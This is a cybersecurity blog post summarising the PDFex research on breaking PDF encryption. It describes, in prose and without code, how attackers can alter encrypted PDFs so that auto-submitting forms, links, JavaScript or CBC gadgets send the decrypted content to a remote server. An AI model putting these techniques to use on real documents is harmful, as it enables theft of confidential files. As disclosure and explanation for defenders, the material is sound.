Skip to main content

Researchers Find New Hack To Read Content Of Password Protected PDF Files

Researchers Find New Hack To Read Content Of Password Protected PDF Files

Looking for ways to unlock and read the content of a password-protected or encrypted PDF file without knowing the password?

Well, that's now possible, thanks to a set of attacking techniques that could allow attackers to access the entire content of a password-protected or encrypted PDF file.

PDFex, the new techniques include two classes of attacks that take advantage of a vulnerability in the standard encryption protection built into the PDF (Portable Document Format). The PDFex doesn't allow an attacker to know or remove the password for an encrypted PDF file. But it allows an attacker to remotely exfiltrate content once a legitimate user opens that PDF file.

In other words, PDFex attack allows attackers to modify a password-protected or encrypted PDF file, without having the corresponding password, in a way that when opened by someone with the correct password, the file will automatically send out a copy of the decrypted content to a remote attacker.

PDFex was tested against 27 desktop and web PDF viewers, such as Adobe Acrobat, Foxit Reader, Evince, Nitro Reader, Okular, and the built-in PDF viewers of Chrome, Firefox, Safari, and Opera. All of the tested PDF viewers were found vulnerable.

It is important to note that the attack is targeting the encryption supported by the PDF (Portable Document Format) standard, not external applications.

PDFex Attacks Exploit Two PDF Vulnerabilities

Two major vulnerabilities of PDFex attacks are :

1. Partial Encryption

Standard PDF specification by design supports partial encryption that allows only strings and streams to be encrypted, while objects defining the PDF file's structure remains unencrypted.

Thus, support for the mixing of plaintexts with ciphertexts leaves an opportunity for attackers to easily manipulate the file structure and inject a malicious payload into it.

2. Ciphertext Malleability

PDF encryption uses the CBC (Cipher Block Chaining) encryption mode with no integrity checks, that can be used by attackers to create self-exfiltrating ciphertext parts.

PDFex Attack Classes: Direct Exfiltration and CBC Gadgets

Now, Let's understand the two classes of PDFex attacks.

Class A : Direct Exfiltration

Researchers Find New Hack To Read Content Of Password Protected PDF Files

It takes advantage of the partial encryption feature (means don't encrypt the entire PDF file, leaving some parts unencrypted) of a password-protected PDF file.

Thus, an attacker can modify the unencrypted field, add unencrypted objects and create a trapped PDF file that when decrypted and opened will attempt to send the file's content to an attacker.

This can be achieved in three ways :

1. By modifying a PDF file's unencrypted data to add a PDF form that auto submits the PDF's content to an attacker's server when the victim decrypts and opens an encrypted PDF file.

2. By modifying a PDF file's unencrypted data to add a link that automatically triggers when the victim decrypts and opens an encrypted PDF file.

3. By modifying a PDF file's unencrypted data to add JavaScript code that automatically runs when victims decrypts and opens an encrypted PDF file.

Out of three ways, the first one is easier to perform and most efficient as it doesn't require user interaction. The second one requires opening an external browser, and the user could prevent this. The third one is the less reliable method because many PDF apps limit JavaScript (JS) support due to security risks with having PDF files run JS code in the background.

As shown in the picture, the object which contains the link (in blue color) for form submission is not encrypted and completely controlled by an attacker.

Class B : CBC Gadgets

CBC gadgets mean that the ciphertext is modified to exfiltrate itself after decryption.

Researchers Find New Hack To Read Content Of Password Protected PDF Files

Not all PDF viewers support partially encrypted documents, but many of them also don't have file integrity protection, which allows attackers to modify the unencrypted data directly within an encrypted object.

The attack scenario of CBC gadget is almost the same as the Direct Exfiltration attacks with the only difference that here attacker modifies the existing encrypted content (after a user opens encrypted PDF file) or create new content from CBC gadgets to add actions that define how to exfiltrate data.

Besides this, if a PDF file contains compressed streams to reduce the file size, attackers need to use half-open object streams to steal the data.

An attacker can use a CBC gadget to modify the encrypted content so that they create trapped PDF files that submit their own content to remote servers via PDF forms or URLs.

Among 27 widely used desktop and web PDF viewers, all of them are vulnerable to at least one of those attacks.

Researchers Find New Hack To Read Content Of Password Protected PDF Files

All of these attacks require that an attacker is in a position to modify encrypted PDF files. This includes a position to intercept the user's network traffic or having physical access to a storage system.

PDFex is a major vulnerability in the PDF standard and this must be fixed in future PDF specifications.

For more details of the PDFex attacks, you can go on to this website released by the researchers and the research paper titled, " Practical Decryption exFiltration: Breaking PDF Encryption." 

I hope you find useful information in this article. If you have any questions then please mention in the comments section and I will get back to you and stay tuned with my blog to learn interesting things related to cybersecurity and hacking.


Popular posts from this blog

How To Check If a Link Is Safe To Click

Many times, we share links among our friends on social media platforms like WhatsApp, Facebook, Instagram or Twitter. But do we know how safe they are? What can happen if you click on any malicious link? We never think of the following things : Links can drop various harmful programs, viruses on your device Links can steal your personal data by dropping spyware or keyloggers Use your browser for crypto mining which will affect your device's performance Even if your device is secured with antivirus, not all of them warn you before clicking such malicious links . And the moment you click on these, they will become big trouble for you. This can sometimes even be dangerous with regard to data security and identity theft. So, Be careful about what you click on. These days one of the quickest growing security issues is ransomware , which is often spread by the user unintentionally clicking dangerous links in emails, social media platforms, messengers, and other tool

How To Enable WhatsApp Fingerprint Lock Feature on Android

WhatsApp has officially rolled out the fingerprint lock feature for all the Android users. Most of you may already have been doing it for the last few years with the help of third-party app lockers for adding more security. Keeping that in mind and to make the process quicker and safer at the same time, WhatsApp has now launched this new fingerprint lock feature so that you can open the app by your fingerprint. It means that regardless of whether the phone is opened, others won't have the option to gain access to the messages without your fingerprint. So, you can now secure your WhatsApp conversations with an extra layer of biometric security . With this step, WhatsApp is finally offering biometric authentication to the Android app, while iPhone users enjoying both the Touch ID that is the fingerprint recognition and Face ID that is the facial recognition since the month of February 2019. WhatsApp is also giving more options with the new fingerprint lock featur

TikTok Secretly Sent Users Private Data & PII Number to Chinese Server Including Draft Videos

The popular Android and iOS short-videos creating app, TikTok hit with a lawsuit claims that the app illegally and secretly transfers app's users' private sensitive data and Personally Identifiable Information (PII) to Chinese servers. TikTok which is a 15-second short-video creating app especially popular among the younger generation and also downloaded over 1.3 Billion times worldwide . TikTok remains top in the most downloaded app list for months on the Apple App Store and Google Play Store.  According to the lawsuit, Tiktok shared the user's created videos which include private acts and closeups of user's faces (biometric data) before the videos are saved on the app. TikTok provides many options includes the next button, close button, and button for effects to its users while recording the video. Here, the next button takes users to the screen that shows these two options : "post" and "save".  After clicking on the "next" button, Tik